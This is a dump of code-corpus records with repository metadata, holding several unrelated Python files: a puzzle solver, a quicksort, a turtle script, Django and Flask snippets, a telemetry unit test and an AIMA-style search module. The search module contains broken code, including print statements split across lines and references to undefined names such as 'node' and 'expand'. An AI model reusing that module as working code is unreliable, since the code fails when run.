blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9d3f1e1eaaf40864ef9e266b4fd7d25f9d328b21 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /mYGipMffRTYxYmv5i_3.py | 1c5ebcf46c86f6f779f84e38b73917754d45490f | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,929 | py |
import itertools
def simple_equation(a,b,c):
numbers = [a,b,c]
for eachcombo in itertools.permutations(numbers,2):
first_num = eachcombo[0]
second_num = eachcombo[1]
if c != first_num and c != second_num:
if first_num + second_num == c:
return '{}+{}={}'.format(first_num,second_num,c)
elif first_num - second_num == c:
return '{}-{}={}'.format(first_num,second_num,c)
elif first_num * second_num == c:
return '{}*{}={}'.format(first_num,second_num,c)
try:
if first_num // second_num == c:
return '{}/{}={}'.format(first_num,second_num,c)
except Exception as e:
continue
elif b != first_num and b != second_num:
if first_num + second_num == b:
return '{}+{}={}'.format(first_num,second_num,b)
elif first_num - second_num == b:
return '{}-{}={}'.format(first_num,second_num,b)
elif first_num * second_num == b:
return '{}*{}={}'.format(first_num,second_num,b)
try:
if first_num // second_num == b:
return '{}/{}={}'.format(first_num,second_num,b)
except Exception as e:
continue
elif a != first_num and a != second_num:
if first_num + second_num == a:
return '{}+{}={}'.format(first_num,second_num,a)
elif first_num - second_num == a:
return '{}-{}={}'.format(first_num,second_num,a)
elif first_num * second_num == a:
return '{}*{}={}'.format(first_num,second_num,a)
try:
if first_num // second_num == a:
return '{}/{}={}'.format(first_num,second_num,a)
except Exception as e:
continue
return ''
| [
"[email protected]"
] | |
f71f89c4c19d7d8045d9c586cb80e5b3176cf92f | ec53949dafa4b6ad675d679b05ed7c83fef2c69a | /DataStructuresAndAlgo/SortAlgo/QuickSort/QuickSort.py | ec6d49ec37082d18b789ab13db62a63fe2db4d61 | [] | no_license | tpotjj/Python | 9a5a20a53cd7a6ec14386c1db8ce155e0fc9ab8a | ca73c116ada4d05c0c565508163557744c86fc76 | refs/heads/master | 2023-07-11T16:37:10.039522 | 2021-08-14T11:17:55 | 2021-08-14T11:17:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 610 | py | def partition(CustomList, low, high):
i = low -1
pivot = CustomList[high]
for j in range(low, high):
if CustomList[j] <= pivot:
i += 1
CustomList[i], CustomList[j] = CustomList[j], CustomList[i]
CustomList[i+1], CustomList[high] = CustomList[high], CustomList[i+1]
return (i+1)
def Quicksort(CustomList, low, high):
if low < high:
pi = partition(CustomList, low, high)
Quicksort(CustomList, low, pi-1)
Quicksort(CustomList, pi+1, high)
BasicList = [2, 6, 4, 8, 1, 3]
print(BasicList)
Quicksort(BasicList, 0, 5)
print(BasicList) | [
"[email protected]"
] | |
f155e40ab83b0e0703d0bfe760ae2c41de4fcdb7 | e5e9ee9e4db2e400e7f87647501ee412c13d76e5 | /python/python-base/turtle/fun.py | 5cab82c491cf1fee60b9d184422b03d78cfa699e | [] | no_license | beingveera/whole-python | 524441eec44379c36cb1cfeccdbc65bf1c15d2f6 | 3f2b3cb7528afb9605ab6f9d4d2efc856a247af5 | refs/heads/main | 2023-05-15T06:28:03.058105 | 2021-06-05T09:37:47 | 2021-06-05T09:37:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | import turtle as t
t.fd(1000)
t.setposition(200,-490)
t.clear()
t.speed(0.1)
t.circle(-50)
t.tracer(1,3)
t.color('blue')
t.pensize(10)
t.circle(20) | [
"[email protected]"
] | |
dcec9dfe44d580ff70c968b38dcb5e9e06fac39d | eb57e632fb351db1975ad0e15bd480759bbc153b | /sysinf/urls.py | 3c44a5f757052a14c4ca9c32626da21663101d8a | [
"MIT"
] | permissive | raikel/dnfas | 163ebc59fc6d4a12c044de33136cdce7ed7ddf0e | 567bcc6656c75ee5167bd248045ec24e37de07b8 | refs/heads/master | 2021-06-27T02:22:30.508109 | 2020-03-25T20:11:04 | 2020-03-25T20:11:04 | 224,517,088 | 0 | 0 | MIT | 2021-03-19T22:52:15 | 2019-11-27T21:07:07 | Python | UTF-8 | Python | false | false | 167 | py | from django.urls import path
from .views import SystemStatsView
app_name = 'sysinf'
urlpatterns = [
path('system/', SystemStatsView.as_view(), name='system')
]
| [
"[email protected]"
] | |
8348e16c6785697fe7de5e82d5b2cccf17d8a39d | 56231e5b77a8b743e84e43d28691da36b89a0cca | /platform-tools/systrace/catapult/telemetry/telemetry/testing/run_tests_unittest.py | 8728813fb8ee52fb77629c0039869526582c60cf | [
"MIT",
"LicenseRef-scancode-proprietary-license",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | cricketclubucd/davisdragons | ee3aa6ad72197c2218660843e03d58c562b965aa | 99d5877377b80d1b20c78cc3c4c6f26795f29b14 | refs/heads/master | 2023-01-30T05:37:45.923195 | 2021-01-27T06:30:25 | 2021-01-27T06:30:25 | 96,661,120 | 2 | 2 | MIT | 2023-01-23T18:42:26 | 2017-07-09T04:32:10 | HTML | UTF-8 | Python | false | false | 3,762 | py | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from telemetry.core import util
from telemetry.testing import run_tests
class MockArgs(object):
def __init__(self):
self.positional_args = []
self.exact_test_filter = True
self.run_disabled_tests = False
self.skip = []
class MockPossibleBrowser(object):
def __init__(self, browser_type, os_name, os_version_name,
supports_tab_control):
self.browser_type = browser_type
self.platform = MockPlatform(os_name, os_version_name)
self.supports_tab_control = supports_tab_control
class MockPlatform(object):
def __init__(self, os_name, os_version_name):
self.os_name = os_name
self.os_version_name = os_version_name
def GetOSName(self):
return self.os_name
def GetOSVersionName(self):
return self.os_version_name
class RunTestsUnitTest(unittest.TestCase):
def _GetEnabledTests(self, browser_type, os_name, os_version_name,
supports_tab_control, args=None):
if not args:
args = MockArgs()
runner = run_tests.typ.Runner()
host = runner.host
runner.top_level_dir = util.GetTelemetryDir()
runner.args.tests = [host.join(util.GetTelemetryDir(),
'telemetry', 'testing', 'disabled_cases.py')]
possible_browser = MockPossibleBrowser(
browser_type, os_name, os_version_name, supports_tab_control)
runner.classifier = run_tests.GetClassifier(args, possible_browser)
_, test_set = runner.find_tests(runner.args)
return set(test.name.split('.')[-1] for test in test_set.parallel_tests)
def testSystemMacMavericks(self):
self.assertEquals(
set(['testAllEnabled',
'testMacOnly',
'testMavericksOnly',
'testNoChromeOS',
'testNoWinLinux',
'testSystemOnly',
'testHasTabs']),
self._GetEnabledTests('system', 'mac', 'mavericks', True))
def testSystemMacLion(self):
self.assertEquals(
set(['testAllEnabled',
'testMacOnly',
'testNoChromeOS',
'testNoMavericks',
'testNoWinLinux',
'testSystemOnly',
'testHasTabs']),
self._GetEnabledTests('system', 'mac', 'lion', True))
def testCrosGuestChromeOS(self):
self.assertEquals(
set(['testAllEnabled',
'testChromeOSOnly',
'testNoMac',
'testNoMavericks',
'testNoSystem',
'testNoWinLinux',
'testHasTabs']),
self._GetEnabledTests('cros-guest', 'chromeos', '', True))
def testCanaryWindowsWin7(self):
self.assertEquals(
set(['testAllEnabled',
'testNoChromeOS',
'testNoMac',
'testNoMavericks',
'testNoSystem',
'testWinOrLinuxOnly',
'testHasTabs']),
self._GetEnabledTests('canary', 'win', 'win7', True))
def testDoesntHaveTabs(self):
self.assertEquals(
set(['testAllEnabled',
'testNoChromeOS',
'testNoMac',
'testNoMavericks',
'testNoSystem',
'testWinOrLinuxOnly']),
self._GetEnabledTests('canary', 'win', 'win7', False))
def testSkip(self):
args = MockArgs()
args.skip = ['telemetry.*testNoMac', '*NoMavericks',
'telemetry.testing.disabled_cases.DisabledCases.testNoSystem']
self.assertEquals(
set(['testAllEnabled',
'testNoChromeOS',
'testWinOrLinuxOnly',
'testHasTabs']),
self._GetEnabledTests('canary', 'win', 'win7', True, args))
| [
"[email protected]"
] | |
bb1db72e1417f503a51c53cab45015887b5df63a | 8ba041911be24ba453d6df60ddf47e7d2aedfde5 | /model.py | ff354766fccfa1efd6fe85425ef183d0be6f6c83 | [] | no_license | dmcdekker/testing-1 | 9c0beda3fbdb9d37a812e903800f4c976cd0bbae | ee6cbab6aec40adde9971005d9c79862fb3bfe7a | refs/heads/master | 2020-03-15T14:07:38.046358 | 2018-05-04T19:58:29 | 2018-05-04T19:58:29 | 132,183,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 935 | py | from flask.ext.sqlalchemy import SQLAlchemy
db = SQLAlchemy()
class Game(db.Model):
"""Board game."""
__tablename__ = "games"
game_id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(20), nullable=False, unique=True)
description = db.Column(db.String(100))
def connect_to_db(app, db_uri="postgresql:///games"):
app.config['SQLALCHEMY_DATABASE_URI'] = db_uri
db.app = app
db.init_app(app)
def example_data():
"""Create example data for the test database."""
#FIXME: write a function that creates a game and adds it to the database.
game1 = Game(name="My Little Pony", description="A pony game")
game2 = Game(name="Good or Evil", description="Are you good or evil?!")
db.session.add_all([game1, game2])
db.session.commit()
if __name__ == '__main__':
from server import app
connect_to_db(app)
print "Connected to DB."
| [
"[email protected]"
] | |
d44f01bcd4e7d2b34ab46450cdb1c6ab87d512a1 | f3daf8a0bf10c38e8a96b518aa08195241adf7cb | /HW1b/search.py | 5bcde67610641f501f48b5b43d19114b792f6787 | [] | no_license | trademark152/Artificial_Intelligence_USC | c9dc8e70a6bc2228ccfaeb911e497de82b4f7b9a | 5e3464c9af84786d540fe74a275f835395d6836a | refs/heads/master | 2020-09-26T09:31:06.840819 | 2019-12-06T02:16:56 | 2019-12-06T02:16:56 | 226,227,591 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28,545 | py | """Search (Chapters 3-4)
The way to use this code is to subclass Problem to create a class of problems,
then create problem instances and solve them with calls to the various search
functions."""
from __future__ import generators
from utils import *
import agents
import math, random, sys, time, bisect, string
# ______________________________________________________________________________
class Problem:
"""The abstract class for a formal problem. You should subclass this and
implement the method successor, and possibly __init__, goal_test, and
path_cost. Then you will create instances of your subclass and solve them
with the various search functions."""
def __init__(self, initial, goal=None):
"""The constructor specifies the initial state, and possibly a goal
state, if there is a unique goal. Your subclass's constructor can add
other arguments."""
self.initial = initial ; self.goal = goal
def successor(self, state):
"""Given a state, return a sequence of (action, state) pairs reachable
from this state. If there are many successors, consider an iterator
that yields the successors one at a time, rather than building them
all at once. Iterators will work fine within the framework."""
abstract
def goal_test(self, state):
"""Return True if the state is a goal. The default method compares the
state to self.goal, as specified in the constructor. Implement this
method if checking against a single self.goal is not enough."""
return state == self.goal
def path_cost(self, c, state1, action, state2):
"""Return the cost of a solution path that arrives at state2 from
state1 via action, assuming cost c to get up to state1. If the problem
is such that the path doesn't matter, this function will only look at
state2. If the path does matter, it will consider c and maybe state1
and action. The default method costs 1 for every step in the path."""
return c + 1
def value(self):
"""For optimization problems, each state has a value. Hill-climbing
and related algorithms try to maximize this value."""
abstract
# ______________________________________________________________________________
class Node:
"""A node in a search tree. Contains a pointer to the parent (the node
that this is a successor of) and to the actual state for this node. Note
that if a state is arrived at by two paths, then there are two nodes with
the same state. Also includes the action that got us to this state, and
the total path_cost (also known as g) to reach the node. Other functions
may add an f and h value; see best_first_graph_search and astar_search for
an explanation of how the f and h values are handled. You will not need to
subclass this class."""
def __init__(self, state, parent=None, action=None, path_cost=0):
"Create a search tree Node, derived from a parent by an action."
update(self, state=state, parent=parent, action=action,
path_cost=path_cost, depth=0)
if parent:
self.depth = parent.depth + 1
def __repr__(self):
return "<Node %s>" % (self.state,)
def path(self):
"Create a list of nodes from the root to this node."
x, result = self, [self]
while x.parent:
result.append(x.parent)
x = x.parent
return result
def expand(self, problem):
"Return a list of nodes reachable from this node. [Fig. 3.8]"
return [Node(next, self, act,
problem.path_cost(self.path_cost, self.state, act, next))
for (act, next) in problem.successor(self.state)]
# ______________________________________________________________________________
class SimpleProblemSolvingAgent(agents.Agent):
"""Abstract framework for problem-solving agent. [Fig. 3.1]"""
def __init__(self):
Agent.__init__(self)
state = []
seq = []
def program(percept):
state = self.update_state(state, percept)
if not seq:
goal = self.formulate_goal(state)
problem = self.formulate_problem(state, goal)
seq = self.search(problem)
action = seq[0]
seq[0:1] = []
return action
self.program = program
# ______________________________________________________________________________
## Uninformed Search algorithms
def tree_search(problem, fringe):
"""Search through the successors of a problem to find a goal.
The argument fringe should be an empty queue.
Don't worry about repeated paths to a state. [Fig. 3.8]"""
fringe.append(Node(problem.initial))
while fringe:
node = fringe.pop()
if problem.goal_test(node.state):
return node
fringe.extend(node.expand(problem))
return None
def breadth_first_tree_search(problem):
"Search the shallowest nodes in the search tree first. [p 74]"
return tree_search(problem, FIFOQueue())
def depth_first_tree_search(problem):
"Search the deepest nodes in the search tree first. [p 74]"
return tree_search(problem, Stack())
def graph_search(problem, fringe):
"""Search through the successors of a problem to find a goal.
The argument fringe should be an empty queue.
If two paths reach a state, only use the best one. [Fig. 3.18]"""
closed = {}
fringe.append(Node(problem.initial))
while fringe:
node = fringe.pop()
if problem.goal_test(node.state):
return node
if node.state not in closed:
closed[node.state] = True
fringe.extend(node.expand(problem))
return None
def breadth_first_graph_search(problem):
"Search the shallowest nodes in the search tree first. [p 74]"
return graph_search(problem, FIFOQueue())
def depth_first_graph_search(problem):
"Search the deepest nodes in the search tree first. [p 74]"
return graph_search(problem, Stack())
def depth_limited_search(problem, limit=50):
"[Fig. 3.12]"
def recursive_dls(node, problem, limit):
cutoff_occurred = False
if problem.goal_test(node.state):
return node
elif node.depth == limit:
return 'cutoff'
else:
for successor in node.expand(problem):
result = recursive_dls(successor, problem, limit)
if result == 'cutoff':
cutoff_occurred = True
elif result != None:
return result
if cutoff_occurred:
return 'cutoff'
else:
return None
# Body of depth_limited_search:
return recursive_dls(Node(problem.initial), problem, limit)
def iterative_deepening_search(problem):
"[Fig. 3.13]"
for depth in xrange(sys.maxint):
result = depth_limited_search(problem, depth)
if result is not 'cutoff':
return result
# ______________________________________________________________________________
# Informed (Heuristic) Search
def best_first_graph_search(problem, f):
"""Search the nodes with the lowest f scores first.
You specify the function f(node) that you want to minimize; for example,
if f is a heuristic estimate to the goal, then we have greedy best
first search; if f is node.depth then we have depth-first search.
There is a subtlety: the line "f = memoize(f, 'f')" means that the f
values will be cached on the nodes as they are computed. So after doing
a best first search you can examine the f values of the path returned."""
f = memoize(f, 'f')
return graph_search(problem, PriorityQueue(min, f))
greedy_best_first_graph_search = best_first_graph_search
# Greedy best-first search is accomplished by specifying f(n) = h(n).
def astar_search(problem, h=None):
"""A* search is best-first graph search with f(n) = g(n)+h(n).
You need to specify the h function when you call astar_search.
Uses the pathmax trick: f(n) = max(f(n), g(n)+h(n))."""
h = h or problem.h
def f(n):
return max(getattr(n, 'f', -infinity), n.path_cost + h(n))
return best_first_graph_search(problem, f)
# ______________________________________________________________________________
## Other search algorithms
def recursive_best_first_search(problem):
"[Fig. 4.5]"
def RBFS(problem, node, flimit):
if problem.goal_test(node.state):
return node
successors = expand(node, problem)
if len(successors) == 0:
return None, infinity
for s in successors:
s.f = max(s.path_cost + s.h, node.f)
while True:
successors.sort(lambda x, y: x.f - y.f) # Order by lowest f value
best = successors[0]
if best.f > flimit:
return None, best.f
alternative = successors[1]
result, best.f = RBFS(problem, best, min(flimit, alternative))
if result is not None:
return result
return RBFS(Node(problem.initial), infinity)
def hill_climbing(problem):
"""From the initial node, keep choosing the neighbor with highest value,
stopping when no neighbor is better. [Fig. 4.11]"""
current = Node(problem.initial)
while True:
neighbor = argmax(expand(node, problem), Node.value)
if neighbor.value() <= current.value():
return current.state
current = neighbor
def exp_schedule(k=20, lam=0.005, limit=100):
"One possible schedule function for simulated annealing"
return lambda t: if_(t < limit, k * math.exp(-lam * t), 0)
def simulated_annealing(problem, schedule=exp_schedule()):
"[Fig. 4.5]"
current = Node(problem.initial)
for t in xrange(sys.maxint):
T = schedule(t)
if T == 0:
return current
next = random.choice(expand(node.problem))
delta_e = next.path_cost - current.path_cost
if delta_e > 0 or probability(math.exp(delta_e / T)):
current = next
def online_dfs_agent(a):
"[Fig. 4.12]"
pass #### more
def lrta_star_agent(a):
"[Fig. 4.12]"
pass #### more
# ______________________________________________________________________________
# Genetic Algorithm
def genetic_search(problem, fitness_fn, ngen=1000, pmut=0.0, n=20):
"""Call genetic_algorithm on the appropriate parts of a problem.
This requires that the problem has a successor function that generates
reasonable states, and that it has a path_cost function that scores states.
We use the negative of the path_cost function, because costs are to be
minimized, while genetic-algorithm expects a fitness_fn to be maximized."""
states = [s for (a, s) in problem.successor(problem.initial_state)[:n]]
random.shuffle(states)
fitness_fn = lambda s: - problem.path_cost(0, s, None, s)
return genetic_algorithm(states, fitness_fn, ngen, pmut)
def genetic_algorithm(population, fitness_fn, ngen=1000, pmut=0.0):
"""[Fig. 4.7]"""
def reproduce(p1, p2):
c = random.randrange(len(p1))
return p1[:c] + p2[c:]
for i in range(ngen):
new_population = []
for i in len(population):
p1, p2 = random_weighted_selections(population, 2, fitness_fn)
child = reproduce(p1, p2)
if random.uniform(0, 1) > pmut:
child.mutate()
new_population.append(child)
population = new_population
return argmax(population, fitness_fn)
def random_weighted_selection(seq, n, weight_fn):
"""Pick n elements of seq, weighted according to weight_fn.
That is, apply weight_fn to each element of seq, add up the total.
Then choose an element e with probability weight[e]/total.
Repeat n times, with replacement. """
totals = [];
runningtotal = 0
for item in seq:
runningtotal += weight_fn(item)
totals.append(runningtotal)
selections = []
for s in range(n):
r = random.uniform(0, totals[-1])
for i in range(len(seq)):
if totals[i] > r:
selections.append(seq[i])
break
return selections
# _____________________________________________________________________________
# The remainder of this file implements examples for the search algorithms.
# ______________________________________________________________________________
# Graphs and Graph Problems
class Graph:
"""A graph connects nodes (verticies) by edges (links). Each edge can also
have a length associated with it. The constructor call is something like:
g = Graph({'A': {'B': 1, 'C': 2})
this makes a graph with 3 nodes, A, B, and C, with an edge of length 1 from
A to B, and an edge of length 2 from A to C. You can also do:
g = Graph({'A': {'B': 1, 'C': 2}, directed=False)
This makes an undirected graph, so inverse links are also added. The graph
stays undirected; if you add more links with g.connect('B', 'C', 3), then
inverse link is also added. You can use g.nodes() to get a list of nodes,
g.get('A') to get a dict of links out of A, and g.get('A', 'B') to get the
length of the link from A to B. 'Lengths' can actually be any object at
all, and nodes can be any hashable object."""
def __init__(self, dict=None, directed=True):
self.dict = dict or {}
self.directed = directed
if not directed: self.make_undirected()
def make_undirected(self):
"Make a digraph into an undirected graph by adding symmetric edges."
for a in self.dict.keys():
for (b, distance) in self.dict[a].items():
self.connect1(b, a, distance)
def connect(self, A, B, distance=1):
"""Add a link from A and B of given distance, and also add the inverse
link if the graph is undirected."""
self.connect1(A, B, distance)
if not self.directed: self.connect1(B, A, distance)
def connect1(self, A, B, distance):
"Add a link from A to B of given distance, in one direction only."
self.dict.setdefault(A, {})[B] = distance
def get(self, a, b=None):
"""Return a link distance or a dict of {node: distance} entries.
.get(a,b) returns the distance or None;
.get(a) returns a dict of {node: distance} entries, possibly {}."""
links = self.dict.setdefault(a, {})
if b is None:
return links
else:
return links.get(b)
def nodes(self):
"Return a list of nodes in the graph."
return self.dict.keys()
def UndirectedGraph(dict=None):
"Build a Graph where every edge (including future ones) goes both ways."
return Graph(dict=dict, directed=False)
def RandomGraph(nodes=range(10), min_links=2, width=400, height=300,
curvature=lambda: random.uniform(1.1, 1.5)):
"""Construct a random graph, with the specified nodes, and random links.
The nodes are laid out randomly on a (width x height) rectangle.
Then each node is connected to the min_links nearest neighbors.
Because inverse links are added, some nodes will have more connections.
The distance between nodes is the hypotenuse times curvature(),
where curvature() defaults to a random number between 1.1 and 1.5."""
g = UndirectedGraph()
g.locations = {}
## Build the cities
for node in nodes:
g.locations[node] = (random.randrange(width), random.randrange(height))
## Build roads from each city to at least min_links nearest neighbors.
for i in range(min_links):
for node in nodes:
if len(g.get(node)) < min_links:
here = g.locations[node]
def distance_to_node(n):
if n is node or g.get(node, n): return infinity
return distance(g.locations[n], here)
neighbor = argmin(nodes, distance_to_node)
d = distance(g.locations[neighbor], here) * curvature()
g.connect(node, neighbor, int(d))
return g
romania = UndirectedGraph(Dict(
A=Dict(Z=75, S=140, T=118),
B=Dict(U=85, P=101, G=90, F=211),
C=Dict(D=120, R=146, P=138),
D=Dict(M=75),
E=Dict(H=86),
F=Dict(S=99),
H=Dict(U=98),
I=Dict(V=92, N=87),
L=Dict(T=111, M=70),
O=Dict(Z=71, S=151),
P=Dict(R=97),
R=Dict(S=80),
U=Dict(V=142)))
romania.locations = Dict(
A=(91, 492), B=(400, 327), C=(253, 288), D=(165, 299),
E=(562, 293), F=(305, 449), G=(375, 270), H=(534, 350),
I=(473, 506), L=(165, 379), M=(168, 339), N=(406, 537),
O=(131, 571), P=(320, 368), R=(233, 410), S=(207, 457),
T=(94, 410), U=(456, 350), V=(509, 444), Z=(108, 531))
australia = UndirectedGraph(Dict(
T=Dict(),
SA=Dict(WA=1, NT=1, Q=1, NSW=1, V=1),
NT=Dict(WA=1, Q=1),
NSW=Dict(Q=1, V=1)))
australia.locations = Dict(WA=(120, 24), NT=(135, 20), SA=(135, 30),
Q=(145, 20), NSW=(145, 32), T=(145, 42), V=(145, 37))
class GraphProblem(Problem):
"The problem of searching a graph from one node to another."
def __init__(self, initial, goal, graph):
Problem.__init__(self, initial, goal)
self.graph = graph
def successor(self, A):
"Return a list of (action, result) pairs."
return [(B, B) for B in self.graph.get(A).keys()]
def path_cost(self, cost_so_far, A, action, B):
return cost_so_far + (self.graph.get(A, B) or infinity)
def h(self, node):
"h function is straight-line distance from a node's state to goal."
locs = getattr(self.graph, 'locations', None)
if locs:
return int(distance(locs[node.state], locs[self.goal]))
else:
return infinity
# ______________________________________________________________________________
#### NOTE: NQueensProblem not working properly yet.
class NQueensProblem(Problem):
"""The problem of placing N queens on an NxN board with none attacking
each other. A state is represented as an N-element array, where the
a value of r in the c-th entry means there is a queen at column c,
row r, and a value of None means that the c-th column has not been
filled in left. We fill in columns left to right."""
def __init__(self, N):
self.N = N
self.initial = [None] * N
def successor(self, state):
"In the leftmost empty column, try all non-conflicting rows."
if state[-1] is not None:
return [] ## All columns filled; no successors
else:
def place(col, row):
new = state[:]
new[col] = row
return new
col = state.index(None)
return [(row, place(col, row)) for row in range(self.N)
if not self.conflicted(state, row, col)]
def conflicted(self, state, row, col):
"Would placing a queen at (row, col) conflict with anything?"
for c in range(col - 1):
if self.conflict(row, col, state[c], c):
return True
return False
def conflict(self, row1, col1, row2, col2):
"Would putting two queens in (row1, col1) and (row2, col2) conflict?"
return (row1 == row2 ## same row
or col1 == col2 ## same column
or row1 - col1 == row2 - col2 ## same \ diagonal
or row1 + col1 == row2 + col2) ## same / diagonal
def goal_test(self, state):
"Check if all columns filled, no conflicts."
if state[-1] is None:
return False
for c in range(len(state)):
if self.conflicted(state, state[c], c):
return False
return True
# ______________________________________________________________________________
## Inverse Boggle: Search for a high-scoring Boggle board. A good domain for
## iterative-repair and related search tehniques, as suggested by Justin Boyan.
ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
cubes16 = ['FORIXB', 'MOQABJ', 'GURILW', 'SETUPL',
'CMPDAE', 'ACITAO', 'SLCRAE', 'ROMASH',
'NODESW', 'HEFIYE', 'ONUDTK', 'TEVIGN',
'ANEDVZ', 'PINESH', 'ABILYT', 'GKYLEU']
def random_boggle(n=4):
"""Return a random Boggle board of size n x n.
We represent a board as a linear list of letters."""
cubes = [cubes16[i % 16] for i in range(n * n)]
random.shuffle(cubes)
return map(random.choice, cubes)
## The best 5x5 board found by Boyan, with our word list this board scores
## 2274 words, for a score of 9837
boyan_best = list('RSTCSDEIAEGNLRPEATESMSSID')
def print_boggle(board):
"Print the board in a 2-d array."
n2 = len(board);
n = exact_sqrt(n2)
for i in range(n2):
if i % n == 0: print
if board[i] == 'Q': print
'Qu',
else: print
str(board[i]) + ' ',
print
def boggle_neighbors(n2, cache={}):
""""Return a list of lists, where the i-th element is the list of indexes
for the neighbors of square i."""
if cache.get(n2):
return cache.get(n2)
n = exact_sqrt(n2)
neighbors = [None] * n2
for i in range(n2):
neighbors[i] = []
on_top = i < n
on_bottom = i >= n2 - n
on_left = i % n == 0
on_right = (i + 1) % n == 0
if not on_top:
neighbors[i].append(i - n)
if not on_left: neighbors[i].append(i - n - 1)
if not on_right: neighbors[i].append(i - n + 1)
if not on_bottom:
neighbors[i].append(i + n)
if not on_left: neighbors[i].append(i + n - 1)
if not on_right: neighbors[i].append(i + n + 1)
if not on_left: neighbors[i].append(i - 1)
if not on_right: neighbors[i].append(i + 1)
cache[n2] = neighbors
return neighbors
def exact_sqrt(n2):
"If n2 is a perfect square, return its square root, else raise error."
n = int(math.sqrt(n2))
assert n * n == n2
return n
##_____________________________________________________________________________
class Wordlist:
"""This class holds a list of words. You can use (word in wordlist)
to check if a word is in the list, or wordlist.lookup(prefix)
to see if prefix starts any of the words in the list."""
def __init__(self, filename, min_len=3):
lines = open(filename).read().upper().split()
self.words = [word for word in lines if len(word) >= min_len]
self.words.sort()
self.bounds = {}
for c in ALPHABET:
c2 = chr(ord(c) + 1)
self.bounds[c] = (bisect.bisect(self.words, c),
bisect.bisect(self.words, c2))
def lookup(self, prefix, lo=0, hi=None):
"""See if prefix is in dictionary, as a full word or as a prefix.
Return two values: the first is the lowest i such that
words[i].startswith(prefix), or is None; the second is
True iff prefix itself is in the Wordlist."""
words = self.words
i = bisect.bisect_left(words, prefix, lo, hi)
if i < len(words) and words[i].startswith(prefix):
return i, (words[i] == prefix)
else:
return None, False
def __contains__(self, word):
return self.words[bisect.bisect_left(self.words, word)] == word
def __len__(self):
return len(self.words)
##_____________________________________________________________________________
class BoggleFinder:
"""A class that allows you to find all the words in a Boggle board. """
wordlist = None ## A class variable, holding a wordlist
def __init__(self, board=None):
if BoggleFinder.wordlist is None:
BoggleFinder.wordlist = Wordlist("../data/wordlist")
self.found = {}
if board:
self.set_board(board)
def set_board(self, board=None):
"Set the board, and find all the words in it."
if board is None:
board = random_boggle()
self.board = board
self.neighbors = boggle_neighbors(len(board))
self.found = {}
for i in range(len(board)):
lo, hi = self.wordlist.bounds[board[i]]
self.find(lo, hi, i, [], '')
return self
def find(self, lo, hi, i, visited, prefix):
"""Looking in square i, find the words that continue the prefix,
considering the entries in self.wordlist.words[lo:hi], and not
revisiting the squares in visited."""
if i in visited:
return
wordpos, is_word = self.wordlist.lookup(prefix, lo, hi)
if wordpos is not None:
if is_word:
self.found[prefix] = True
visited.append(i)
c = self.board[i]
if c == 'Q': c = 'QU'
prefix += c
for j in self.neighbors[i]:
self.find(wordpos, hi, j, visited, prefix)
visited.pop()
def words(self):
"The words found."
return self.found.keys()
scores = [0, 0, 0, 0, 1, 2, 3, 5] + [11] * 100
def score(self):
"The total score for the words found, according to the rules."
return sum([self.scores[len(w)] for w in self.words()])
def __len__(self):
"The number of words found."
return len(self.found)
##_____________________________________________________________________________
def boggle_hill_climbing(board=None, ntimes=100, print_it=True):
"""Solve inverse Boggle by hill-climbing: find a high-scoring board by
starting with a random one and changing it."""
finder = BoggleFinder()
if board is None:
board = random_boggle()
best = len(finder.set_board(board))
for _ in range(ntimes):
i, oldc = mutate_boggle(board)
new = len(finder.set_board(board))
if new > best:
best = new
print
best, _, board
else:
board[i] = oldc ## Change back
if print_it:
print_boggle(board)
return board, best
def mutate_boggle(board):
i = random.randrange(len(board))
oldc = board[i]
board[i] = random.choice(random.choice(cubes16)) ##random.choice(boyan_best)
return i, oldc
# ______________________________________________________________________________
## Code to compare searchers on various problems.
class InstrumentedProblem(Problem):
"""Delegates to a problem, and keeps statistics."""
def __init__(self, problem):
self.problem = problem
self.succs = self.goal_tests = self.states = 0
self.found = None
def successor(self, state):
"Return a list of (action, state) pairs reachable from this state."
result = self.problem.successor(state)
self.succs += 1;
self.states += len(result)
return result
def goal_test(self, state):
"Return true if the state is a goal."
self.goal_tests += 1
result = self.problem.goal_test(state)
if result:
self.found = state
return result
def __getattr__(self, attr):
if attr in ('succs', 'goal_tests', 'states'):
return self.__dict__[attr]
else:
return getattr(self.problem, attr)
def __repr__(self):
return '<%4d/%4d/%4d/%s>' % (self.succs, self.goal_tests,
self.states, str(self.found)[0:4])
